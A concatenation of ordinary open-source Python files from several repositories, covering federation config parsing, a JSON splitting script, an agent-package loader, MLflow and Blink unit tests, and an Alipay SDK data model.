self.federation_domain_whitelist[domain] = True
federation_metrics_domains = config.get("federation_metrics_domains") or []
validate_config(
_METRICS_FOR_DOMAINS_SCHEMA,
federation_metrics_domains,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(federation_metrics_domains)
self.allow_profile_lookup_over_federation = config.get(
"allow_profile_lookup_over_federation", True
)
self.allow_device_name_lookup_over_federation = config.get(
"allow_device_name_lookup_over_federation", False
)
# Allow for the configuration of timeout, max request retries
# and min/max retry delays in the matrix federation client.
self.client_timeout_ms = Config.parse_duration(
federation_config.get("client_timeout", "60s")
)
self.max_long_retry_delay_ms = Config.parse_duration(
federation_config.get("max_long_retry_delay", "60s")
)
self.max_short_retry_delay_ms = Config.parse_duration(
federation_config.get("max_short_retry_delay", "2s")
)
self.max_long_retries = federation_config.get("max_long_retries", 10)
self.max_short_retries = federation_config.get("max_short_retries", 3)
# Allow for the configuration of the backoff algorithm used
# when trying to reach an unavailable destination.
        # Unlike the timeout and retry values above, these settings apply
        # across multiple requests, and the backoff state is stored in the DB.
self.destination_min_retry_interval_ms = Config.parse_duration(
federation_config.get("destination_min_retry_interval", "10m")
)
self.destination_retry_multiplier = federation_config.get(
"destination_retry_multiplier", 2
)
self.destination_max_retry_interval_ms = min(
Config.parse_duration(
federation_config.get("destination_max_retry_interval", "7d")
),
# Set a hard-limit to not overflow the database column.
2**62,
)
_METRICS_FOR_DOMAINS_SCHEMA = {"type": "array", "items": {"type": "string"}}

# ---- /tools/traceline/traceline/scripts/split.py | repo: chromium/chromium | license: BSD-3-Clause ----

#!/usr/bin/env python
# Copyright 2012 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Splits a single json file (read from stdin) into separate files of 40k
records, named split.X.
"""
import sys
def main():
  filecount = 0
  count = 0
  f = open('split.0', 'wb')
  for l in sys.stdin:
    if l == "},\r\n":
      count += 1
      if count == 40000:
        # Close out the current chunk; the "}]);" footer supplies the final
        # closing brace, so the "},\r\n" line itself is intentionally dropped.
        f.write("}]);\r\n")
        f.close()
        count = 0
        filecount += 1
        f = open('split.%d' % filecount, 'wb')
        f.write("parseEvents([\r\n")
        continue
    f.write(l)
  f.close()
if __name__ == '__main__':
main()

# ---- /aea/components/base.py | repo: fetchai/agents-aea | license: Apache-2.0 ----

|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2023 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains definitions of agent components."""
import importlib.util
import logging
import sys
import types
from abc import ABC
from pathlib import Path
from typing import Any, Optional
from aea.configurations.base import (
ComponentConfiguration,
ComponentId,
ComponentType,
PublicId,
)
from aea.configurations.constants import PACKAGES
from aea.exceptions import AEAEnforceError
from aea.helpers.logging import WithLogger
_default_logger = logging.getLogger(__name__)
class Component(ABC, WithLogger):
"""Abstract class for an agent component."""
__slots__ = ("_configuration", "_directory", "_is_vendor")
def __init__(
self,
configuration: Optional[ComponentConfiguration] = None,
is_vendor: bool = False,
**kwargs: Any,
) -> None:
"""
Initialize a package.
:param configuration: the package configuration.
:param is_vendor: whether the package is vendorized.
:param kwargs: the keyword arguments for the logger.
"""
WithLogger.__init__(self, **kwargs)
self._configuration = configuration
self._directory = None # type: Optional[Path]
self._is_vendor = is_vendor
@property
def component_type(self) -> ComponentType:
"""Get the component type."""
return self.configuration.component_type
@property
def is_vendor(self) -> bool:
"""Get whether the component is vendorized or not."""
return self._is_vendor
@property
def prefix_import_path(self) -> str:
"""Get the prefix import path for this component."""
return self.configuration.prefix_import_path
@property
def component_id(self) -> ComponentId:
"""Ge the package id."""
return self.configuration.component_id
@property
def public_id(self) -> PublicId:
"""Get the public id."""
return self.configuration.public_id
@property
def configuration(self) -> ComponentConfiguration:
"""Get the component configuration."""
if self._configuration is None: # pragma: nocover
raise ValueError("The component is not associated with a configuration.")
return self._configuration
@property
def directory(self) -> Path:
"""Get the directory. Raise error if it has not been set yet."""
if self._directory is None:
raise ValueError("Directory not set yet.")
return self._directory
@directory.setter
def directory(self, path: Path) -> None:
"""Set the directory. Raise error if already set."""
if self._directory is not None: # pragma: nocover
raise ValueError("Directory already set.")
self._directory = path
@property
def build_directory(self) -> Optional[str]:
"""Get build directory for the component."""
return self.configuration.build_directory
def load_aea_package(configuration: ComponentConfiguration) -> None:
"""
Load the AEA package from configuration.
It adds all the __init__.py modules into `sys.modules`.
:param configuration: the configuration object.
"""
dir_ = configuration.directory
if dir_ is None: # pragma: nocover
raise ValueError("configuration's directory is None.")
author = configuration.author
package_type_plural = configuration.component_type.to_plural()
package_name = configuration.name
perform_load_aea_package(dir_, author, package_type_plural, package_name)
def perform_load_aea_package(
dir_: Path, author: str, package_type_plural: str, package_name: str
) -> None:
"""
Load the AEA package from values provided.
It adds all the __init__.py modules into `sys.modules`.
:param dir_: path of the component.
:param author: str
:param package_type_plural: str
:param package_name: str
"""
if dir_ is None or not dir_.exists(): # pragma: nocover
raise AEAEnforceError(f"configuration directory `{dir_}` does not exists.")
prefix_root = PACKAGES
prefix_author = prefix_root + f".{author}"
prefix_pkg_type = prefix_author + f".{package_type_plural}"
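    # Register placeholder parent modules ("packages", "packages.<author>",
    # "packages.<author>.<type_plural>") in sys.modules so the leaf
    # package can be imported under its full dotted path.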
prefix_root_module = types.ModuleType(prefix_root)
prefix_root_module.__path__ = None # type: ignore
sys.modules[prefix_root] = sys.modules.get(prefix_root, prefix_root_module)
author_module = types.ModuleType(prefix_author)
author_module.__path__ = None # type: ignore
sys.modules[prefix_author] = sys.modules.get(prefix_author, author_module)
prefix_pkg_type_module = types.ModuleType(prefix_pkg_type)
prefix_pkg_type_module.__path__ = None # type: ignore
sys.modules[prefix_pkg_type] = sys.modules.get(
prefix_pkg_type, prefix_pkg_type_module
)
prefix_pkg = prefix_pkg_type + f".{package_name}"
for subpackage_init_file in dir_.rglob("__init__.py"):
parent_dir = subpackage_init_file.parent
relative_parent_dir = parent_dir.relative_to(dir_)
if relative_parent_dir == Path("."):
# this handles the case when 'subpackage_init_file'
# is path/to/package/__init__.py
import_path = prefix_pkg
else: # pragma: nocover
import_path = prefix_pkg + "." + ".".join(relative_parent_dir.parts)
spec = importlib.util.spec_from_file_location(import_path, subpackage_init_file)
if spec is None:
raise RuntimeError(f"Error load module from {subpackage_init_file}")
module = importlib.util.module_from_spec(spec)
sys.modules[import_path] = module
_default_logger.debug(f"loading {import_path}: {module}")
spec.loader.exec_module(module) # type: ignore

# ---- /tests/recipes/test_transform_step.py | repo: mlflow/mlflow | license: Apache-2.0 ----

|
import os
from pathlib import Path
from unittest import mock
from unittest.mock import Mock
import pandas as pd
import pytest
import mlflow
from mlflow import MlflowClient
from mlflow.environment_variables import MLFLOW_RECIPES_EXECUTION_DIRECTORY
from mlflow.exceptions import MlflowException
from mlflow.recipes.steps.transform import TransformStep, _validate_user_code_output
from mlflow.recipes.utils import _RECIPE_CONFIG_FILE_NAME
from mlflow.utils.file_utils import read_yaml
# Sets up the transform step and returns the constructed TransformStep instance and step output dir
def set_up_transform_step(recipe_root: Path, transform_user_module):
split_step_output_dir = recipe_root.joinpath("steps", "split", "outputs")
split_step_output_dir.mkdir(parents=True)
transform_step_output_dir = recipe_root.joinpath("steps", "transform", "outputs")
transform_step_output_dir.mkdir(parents=True)
    # Used as both the train and validation outputs of the split step
dataset = pd.DataFrame(
{
"a": list(range(0, 5)),
"b": list(range(5, 10)),
"y": [float(i % 2) for i in range(5)],
}
)
dataset.to_parquet(str(split_step_output_dir / "validation.parquet"))
dataset.to_parquet(str(split_step_output_dir / "train.parquet"))
recipe_yaml = recipe_root.joinpath(_RECIPE_CONFIG_FILE_NAME)
experiment_name = "demo"
MlflowClient().create_experiment(experiment_name)
recipe_yaml.write_text(
f"""
recipe: "regression/v1"
target_col: "y"
experiment:
name: {experiment_name}
tracking_uri: {mlflow.get_tracking_uri()}
steps:
transform:
using: custom
transformer_method: {transform_user_module}
"""
)
recipe_config = read_yaml(recipe_root, _RECIPE_CONFIG_FILE_NAME)
transform_step = TransformStep.from_recipe_config(recipe_config, str(recipe_root))
return transform_step, transform_step_output_dir, split_step_output_dir
def test_transform_step_writes_onehot_encoded_dataframe_and_transformer_pkl(
tmp_recipe_root_path, monkeypatch
):
from sklearn.preprocessing import StandardScaler
m = Mock()
m.transformer_fn = lambda: StandardScaler() # pylint: disable=unnecessary-lambda
monkeypatch.setenv(MLFLOW_RECIPES_EXECUTION_DIRECTORY.name, str(tmp_recipe_root_path))
with mock.patch.dict("sys.modules", {"steps.transform": m}):
transform_step, transform_step_output_dir, _ = set_up_transform_step(
tmp_recipe_root_path, "transformer_fn"
)
transform_step.run(str(transform_step_output_dir))
assert os.path.exists(transform_step_output_dir / "transformed_training_data.parquet")
transformed = pd.read_parquet(transform_step_output_dir / "transformed_training_data.parquet")
assert len(transformed.columns) == 3
assert os.path.exists(transform_step_output_dir / "transformer.pkl")
@pytest.mark.parametrize("recipe", ["regression/v1", "classification/v1"])
def test_transform_steps_work_without_step_config(tmp_recipe_root_path, recipe):
recipe_yaml = tmp_recipe_root_path.joinpath(_RECIPE_CONFIG_FILE_NAME)
experiment_name = "demo"
MlflowClient().create_experiment(experiment_name)
recipe_yaml.write_text(
"""
recipe: {recipe}
target_col: "y"
{positive_class}
experiment:
name: {experiment_name}
tracking_uri: {tracking_uri}
steps:
fakestep:
something: else
""".format(
tracking_uri=mlflow.get_tracking_uri(),
experiment_name=experiment_name,
recipe=recipe,
            positive_class='positive_class: "a"' if recipe == "classification/v1" else "",
)
)
recipe_config = read_yaml(tmp_recipe_root_path, _RECIPE_CONFIG_FILE_NAME)
transform_step = TransformStep.from_recipe_config(recipe_config, str(tmp_recipe_root_path))
transform_step._validate_and_apply_step_config()
def test_transform_empty_step(tmp_recipe_root_path, monkeypatch):
monkeypatch.setenv(MLFLOW_RECIPES_EXECUTION_DIRECTORY.name, str(tmp_recipe_root_path))
with mock.patch("steps.transform.transformer_fn", return_value=None):
transform_step, transform_step_output_dir, split_step_output_dir = set_up_transform_step(
tmp_recipe_root_path, "transformer_fn"
)
transform_step.run(str(transform_step_output_dir))
assert os.path.exists(transform_step_output_dir / "transformed_training_data.parquet")
train_transformed = pd.read_parquet(
transform_step_output_dir / "transformed_training_data.parquet"
)
train_split = pd.read_parquet(split_step_output_dir / "train.parquet")
assert train_transformed.equals(train_split) is True
assert os.path.exists(transform_step_output_dir / "transformer.pkl")
def test_validate_method_validates_the_transformer():
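    # A valid transformer must expose both fit() and transform(); each
    # incorrect variant below is missing one of the two.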
class Transformer:
def fit(self):
return "fit"
def transform(self):
return "transform"
transformer = Transformer()
def correct_transformer():
return transformer
validated_transformer = _validate_user_code_output(correct_transformer)
assert transformer == validated_transformer
class InCorrectFitTransformer:
def pick(self):
return "pick"
def transform(self):
return "transform"
in_correct_fit_transformer = InCorrectFitTransformer()
def incorrect__fit_transformer():
return in_correct_fit_transformer
with pytest.raises(
MlflowException,
match="The transformer provided doesn't have a fit method.",
):
validated_transformer = _validate_user_code_output(incorrect__fit_transformer)
class InCorrectTransformer:
def pick(self):
return "pick"
def fit(self):
return "fit"
inCorrectTransformer = InCorrectTransformer()
def incorrect_transformer():
return inCorrectTransformer
with pytest.raises(
MlflowException,
match="The transformer provided doesn't have a transform method.",
):
validated_transformer = _validate_user_code_output(incorrect_transformer)

# ---- /alipay/aop/api/domain/MybankCreditLoantradeGuarletterInvoiceApplyModel.py | repo: alipay/alipay-sdk-python-all | license: Apache-2.0 ----

|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.CreditPayMoneyVO import CreditPayMoneyVO
class MybankCreditLoantradeGuarletterInvoiceApplyModel(object):
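    """Domain model for the MyBank credit loan guarantee-letter invoice application."""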
def __init__(self):
self._address = None
self._apply_user_cert_no = None
self._apply_user_name = None
self._bank_card_no = None
self._bank_name = None
self._contact_mobile = None
self._guar_order_no = None
self._invoice_amt = None
self._invoice_type = None
self._phone = None
self._receive_email = None
self._request_id = None
@property
def address(self):
return self._address
@address.setter
def address(self, value):
self._address = value
@property
def apply_user_cert_no(self):
return self._apply_user_cert_no
@apply_user_cert_no.setter
def apply_user_cert_no(self, value):
self._apply_user_cert_no = value
@property
def apply_user_name(self):
return self._apply_user_name
@apply_user_name.setter
def apply_user_name(self, value):
self._apply_user_name = value
@property
def bank_card_no(self):
return self._bank_card_no
@bank_card_no.setter
def bank_card_no(self, value):
self._bank_card_no = value
@property
def bank_name(self):
return self._bank_name
@bank_name.setter
def bank_name(self, value):
self._bank_name = value
@property
def contact_mobile(self):
return self._contact_mobile
@contact_mobile.setter
def contact_mobile(self, value):
self._contact_mobile = value
@property
def guar_order_no(self):
return self._guar_order_no
@guar_order_no.setter
def guar_order_no(self, value):
self._guar_order_no = value
@property
def invoice_amt(self):
return self._invoice_amt
@invoice_amt.setter
def invoice_amt(self, value):
if isinstance(value, CreditPayMoneyVO):
self._invoice_amt = value
else:
self._invoice_amt = CreditPayMoneyVO.from_alipay_dict(value)
@property
def invoice_type(self):
return self._invoice_type
@invoice_type.setter
def invoice_type(self, value):
self._invoice_type = value
@property
def phone(self):
return self._phone
@phone.setter
def phone(self, value):
self._phone = value
@property
def receive_email(self):
return self._receive_email
@receive_email.setter
def receive_email(self, value):
self._receive_email = value
@property
def request_id(self):
return self._request_id
@request_id.setter
def request_id(self, value):
self._request_id = value
def to_alipay_dict(self):
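        # Serialize every populated field, delegating to nested objects
        # that implement to_alipay_dict (e.g. the CreditPayMoneyVO amount).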
params = dict()
if self.address:
if hasattr(self.address, 'to_alipay_dict'):
params['address'] = self.address.to_alipay_dict()
else:
params['address'] = self.address
if self.apply_user_cert_no:
if hasattr(self.apply_user_cert_no, 'to_alipay_dict'):
params['apply_user_cert_no'] = self.apply_user_cert_no.to_alipay_dict()
else:
params['apply_user_cert_no'] = self.apply_user_cert_no
if self.apply_user_name:
if hasattr(self.apply_user_name, 'to_alipay_dict'):
params['apply_user_name'] = self.apply_user_name.to_alipay_dict()
else:
params['apply_user_name'] = self.apply_user_name
if self.bank_card_no:
if hasattr(self.bank_card_no, 'to_alipay_dict'):
params['bank_card_no'] = self.bank_card_no.to_alipay_dict()
else:
params['bank_card_no'] = self.bank_card_no
if self.bank_name:
if hasattr(self.bank_name, 'to_alipay_dict'):
params['bank_name'] = self.bank_name.to_alipay_dict()
else:
params['bank_name'] = self.bank_name
if self.contact_mobile:
if hasattr(self.contact_mobile, 'to_alipay_dict'):
params['contact_mobile'] = self.contact_mobile.to_alipay_dict()
else:
params['contact_mobile'] = self.contact_mobile
if self.guar_order_no:
if hasattr(self.guar_order_no, 'to_alipay_dict'):
params['guar_order_no'] = self.guar_order_no.to_alipay_dict()
else:
params['guar_order_no'] = self.guar_order_no
if self.invoice_amt:
if hasattr(self.invoice_amt, 'to_alipay_dict'):
params['invoice_amt'] = self.invoice_amt.to_alipay_dict()
else:
params['invoice_amt'] = self.invoice_amt
if self.invoice_type:
if hasattr(self.invoice_type, 'to_alipay_dict'):
params['invoice_type'] = self.invoice_type.to_alipay_dict()
else:
params['invoice_type'] = self.invoice_type
if self.phone:
if hasattr(self.phone, 'to_alipay_dict'):
params['phone'] = self.phone.to_alipay_dict()
else:
params['phone'] = self.phone
if self.receive_email:
if hasattr(self.receive_email, 'to_alipay_dict'):
params['receive_email'] = self.receive_email.to_alipay_dict()
else:
params['receive_email'] = self.receive_email
if self.request_id:
if hasattr(self.request_id, 'to_alipay_dict'):
params['request_id'] = self.request_id.to_alipay_dict()
else:
params['request_id'] = self.request_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = MybankCreditLoantradeGuarletterInvoiceApplyModel()
if 'address' in d:
o.address = d['address']
if 'apply_user_cert_no' in d:
o.apply_user_cert_no = d['apply_user_cert_no']
if 'apply_user_name' in d:
o.apply_user_name = d['apply_user_name']
if 'bank_card_no' in d:
o.bank_card_no = d['bank_card_no']
if 'bank_name' in d:
o.bank_name = d['bank_name']
if 'contact_mobile' in d:
o.contact_mobile = d['contact_mobile']
if 'guar_order_no' in d:
o.guar_order_no = d['guar_order_no']
if 'invoice_amt' in d:
o.invoice_amt = d['invoice_amt']
if 'invoice_type' in d:
o.invoice_type = d['invoice_type']
if 'phone' in d:
o.phone = d['phone']
if 'receive_email' in d:
o.receive_email = d['receive_email']
if 'request_id' in d:
o.request_id = d['request_id']
return o

# ---- /third_party/blink/Tools/Scripts/webkitpy/layout_tests/models/test_expectations_unittest.py | repo: youtube/cobalt | license: BSD-3-Clause ----

|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from collections import OrderedDict
import unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system.output_capture import OutputCapture
from webkitpy.layout_tests.models.test_configuration import TestConfiguration, TestConfigurationConverter
from webkitpy.layout_tests.models.test_expectations import (
TestExpectationLine, TestExpectations, ParseError, TestExpectationParser,
PASS, FAIL, TEXT, IMAGE, IMAGE_PLUS_TEXT, AUDIO,
TIMEOUT, CRASH, LEAK, SKIP, WONTFIX, NEEDS_REBASELINE, MISSING
)
class Base(unittest.TestCase):
# Note that all of these tests are written assuming the configuration
# being tested is Windows 7, Release build.
def __init__(self, testFunc):
host = MockHost()
self._port = host.port_factory.get('test-win-win7', None)
self._exp = None
unittest.TestCase.__init__(self, testFunc)
def get_basic_tests(self):
return ['failures/expected/text.html',
'failures/expected/image_checksum.html',
'failures/expected/crash.html',
'failures/expected/needsrebaseline.html',
'failures/expected/needsmanualrebaseline.html',
'failures/expected/image.html',
'failures/expected/timeout.html',
'passes/text.html',
'reftests/failures/expected/needsrebaseline.html',
'reftests/failures/expected/needsrebaseline_with_txt.html',
'reftests/failures/expected/needsmanualrebaseline.html',
'reftests/failures/expected/needsmanualrebaseline_with_txt.html',
'reftests/failures/expected/has_unused_expectation.html']
def get_basic_expectations(self):
return """
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/crash.html [ Crash ]
Bug(test) failures/expected/needsrebaseline.html [ NeedsRebaseline ]
Bug(test) failures/expected/needsmanualrebaseline.html [ NeedsManualRebaseline ]
Bug(test) failures/expected/image_checksum.html [ Crash ]
Bug(test) failures/expected/image.html [ Crash Mac ]
"""
def parse_exp(self, expectations, overrides=None, is_lint_mode=False):
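        """Parse the given expectations text (plus optional overrides) into self._exp."""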
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
self._port.expectations_dict = lambda: expectations_dict
expectations_to_lint = expectations_dict if is_lint_mode else None
self._exp = TestExpectations(self._port, self.get_basic_tests(
), expectations_dict=expectations_to_lint, is_lint_mode=is_lint_mode)
def assert_exp_list(self, test, results):
self.assertEqual(self._exp.get_expectations(test), set(results))
def assert_exp(self, test, result):
self.assert_exp_list(test, [result])
def assert_bad_expectations(self, expectations, overrides=None):
self.assertRaises(ParseError, self.parse_exp, expectations, is_lint_mode=True, overrides=overrides)
class BasicTests(Base):
def test_basic(self):
self.parse_exp(self.get_basic_expectations())
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/image_checksum.html', [CRASH])
self.assert_exp('passes/text.html', PASS)
self.assert_exp('failures/expected/image.html', PASS)
class MiscTests(Base):
def test_parse_mac_legacy_names(self):
host = MockHost()
expectations_dict = OrderedDict()
expectations_dict['expectations'] = '\nBug(x) [ Mac10.10 ] failures/expected/text.html [ Failure ]\n'
port = host.port_factory.get('test-mac-mac10.10', None)
port.expectations_dict = lambda: expectations_dict
expectations = TestExpectations(port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations('failures/expected/text.html'), set([FAIL]))
port = host.port_factory.get('test-win-win7', None)
port.expectations_dict = lambda: expectations_dict
expectations = TestExpectations(port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations('failures/expected/text.html'), set([PASS]))
def test_multiple_results(self):
self.parse_exp('Bug(x) failures/expected/text.html [ Crash Failure ]')
self.assertEqual(self._exp.get_expectations('failures/expected/text.html'), set([FAIL, CRASH]))
def test_result_was_expected(self):
# test basics
self.assertEqual(TestExpectations.result_was_expected(PASS, set([PASS]), test_needs_rebaselining=False), True)
self.assertEqual(TestExpectations.result_was_expected(FAIL, set([PASS]), test_needs_rebaselining=False), False)
# test handling of SKIPped tests and results
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([CRASH]), test_needs_rebaselining=False), True)
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([LEAK]), test_needs_rebaselining=False), True)
# test handling of MISSING results and the REBASELINE specifier
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=True), True)
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=False), False)
self.assertTrue(TestExpectations.result_was_expected(PASS, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(MISSING, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(TEXT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(IMAGE, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(IMAGE_PLUS_TEXT,
set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(AUDIO, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(TIMEOUT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(CRASH, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(LEAK, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
def test_remove_pixel_failures(self):
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([IMAGE])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS, IMAGE, CRASH])), set([PASS, CRASH]))
def test_suffixes_for_expectations(self):
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([IMAGE])), set(['png']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL, IMAGE, CRASH])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set()), set())
def test_category_expectations(self):
        # This test checks that unknown tests are not present in the
        # expectations, and that a known test that is part of a test
        # category is present in the expectations.
exp_str = 'Bug(x) failures/expected [ CRASH ]'
self.parse_exp(exp_str)
        unknown_test = 'failures/expected/unknown-test.html'
        self.assertRaises(KeyError, self._exp.get_expectations,
                          unknown_test)
self.assert_exp_list('failures/expected/crash.html', [PASS])
def test_get_expectations_string(self):
self.parse_exp(self.get_basic_expectations())
self.assertEqual(self._exp.get_expectations_string('failures/expected/text.html'), 'FAIL')
def test_expectation_to_string(self):
# Normal cases are handled by other tests.
self.parse_exp(self.get_basic_expectations())
self.assertRaises(ValueError, self._exp.expectation_to_string,
-1)
def test_get_test_set(self):
        # Handle some corner cases for this routine that are not covered by other tests.
self.parse_exp(self.get_basic_expectations())
test_set = self._exp.get_test_set(CRASH)
self.assertEqual(test_set, set(['failures/expected/crash.html', 'failures/expected/image_checksum.html']))
def test_needs_rebaseline_reftest(self):
try:
filesystem = self._port.host.filesystem
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline-expected.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline_with_txt.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline_with_txt-expected.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline_with_txt-expected.txt'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline-expected.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline_with_txt.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline_with_txt-expected.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline_with_txt-expected.txt'),
'content')
self.parse_exp("""Bug(user) reftests/failures/expected/needsrebaseline.html [ NeedsRebaseline ]
Bug(user) reftests/failures/expected/needsrebaseline_with_txt.html [ NeedsRebaseline ]
Bug(user) reftests/failures/expected/needsmanualrebaseline.html [ NeedsManualRebaseline ]
Bug(user) reftests/failures/expected/needsmanualrebaseline_with_txt.html [ NeedsManualRebaseline ]
""", is_lint_mode=True)
            self.fail("ParseError wasn't raised")
except ParseError as error:
warnings = ('expectations:1 A reftest without text expectation cannot be marked as '
'NeedsRebaseline/NeedsManualRebaseline reftests/failures/expected/needsrebaseline.html\n'
'expectations:3 A reftest without text expectation cannot be marked as '
'NeedsRebaseline/NeedsManualRebaseline reftests/failures/expected/needsmanualrebaseline.html')
self.assertEqual(str(error), warnings)
def test_parse_warning(self):
try:
filesystem = self._port.host.filesystem
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'disabled-test.html-disabled'), 'content')
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'test-to-rebaseline.html'), 'content')
self.parse_exp('Bug(user) [ FOO ] failures/expected/text.html [ Failure ]\n'
'Bug(user) non-existent-test.html [ Failure ]\n'
'Bug(user) disabled-test.html-disabled [ Failure ]\n'
'Bug(user) [ Release ] test-to-rebaseline.html [ NeedsRebaseline ]', is_lint_mode=True)
            self.fail("ParseError wasn't raised")
except ParseError as error:
warnings = ('expectations:1 Unrecognized specifier "FOO" failures/expected/text.html\n'
'expectations:2 Path does not exist. non-existent-test.html\n'
'expectations:4 A test cannot be rebaselined for Debug/Release. test-to-rebaseline.html')
self.assertEqual(str(error), warnings)
def test_parse_warnings_are_logged_if_not_in_lint_mode(self):
oc = OutputCapture()
try:
oc.capture_output()
self.parse_exp('-- this should be a syntax error', is_lint_mode=False)
finally:
_, _, logs = oc.restore_output()
            self.assertNotEqual(logs, '')
def test_error_on_different_platform(self):
# parse_exp uses a Windows port. Assert errors on Mac show up in lint mode.
self.assertRaises(
ParseError,
self.parse_exp,
('Bug(test) [ Mac ] failures/expected/text.html [ Failure ]\n'
'Bug(test) [ Mac ] failures/expected/text.html [ Failure ]'),
is_lint_mode=True)
def test_error_on_different_build_type(self):
# parse_exp uses a Release port. Assert errors on DEBUG show up in lint mode.
self.assertRaises(
ParseError,
self.parse_exp,
('Bug(test) [ Debug ] failures/expected/text.html [ Failure ]\n'
'Bug(test) [ Debug ] failures/expected/text.html [ Failure ]'),
is_lint_mode=True)
def test_overrides(self):
self.parse_exp('Bug(exp) failures/expected/text.html [ Failure ]',
'Bug(override) failures/expected/text.html [ Timeout ]')
self.assert_exp_list('failures/expected/text.html', [FAIL, TIMEOUT])
def test_overrides__directory(self):
self.parse_exp('Bug(exp) failures/expected/text.html [ Failure ]',
'Bug(override) failures/expected [ Crash ]')
self.assert_exp_list('failures/expected/text.html', [FAIL, CRASH])
